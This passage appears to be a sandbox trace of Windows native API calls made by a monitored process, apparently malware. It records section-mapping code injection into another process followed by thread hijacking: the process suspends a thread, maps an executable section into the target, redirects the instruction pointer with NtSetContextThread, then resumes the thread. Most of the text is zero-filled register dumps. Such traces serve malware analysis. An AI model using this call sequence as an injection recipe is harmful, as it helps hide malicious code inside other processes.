[168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.718] NtResumeThread (in: ThreadHandle=0xbc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.719] NtClose (Handle=0x104) returned 0x0 [0195.719] NtClose (Handle=0xbc) returned 0x0 [0195.720] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x8cc, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0195.720] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.720] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.720] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.720] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.721] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xa68) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0195.721] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.721] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xbc, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x2120000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.729] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x38fd68, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x38fd10, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x38fcf4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.729] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.729] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x14f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x150000) returned 0x0 [0195.739] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x14f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0xaa0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x150000) returned 0x0 [0195.767] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.777] NtClose (Handle=0x10c) returned 0x0 [0195.777] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x38fd68, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x38fd10, Eip=0xb5c707, SegCs=0x23, EFlags=0x246, Esp=0x38fcf4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.778] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.778] NtClose (Handle=0xbc) returned 0x0 [0195.778] NtClose 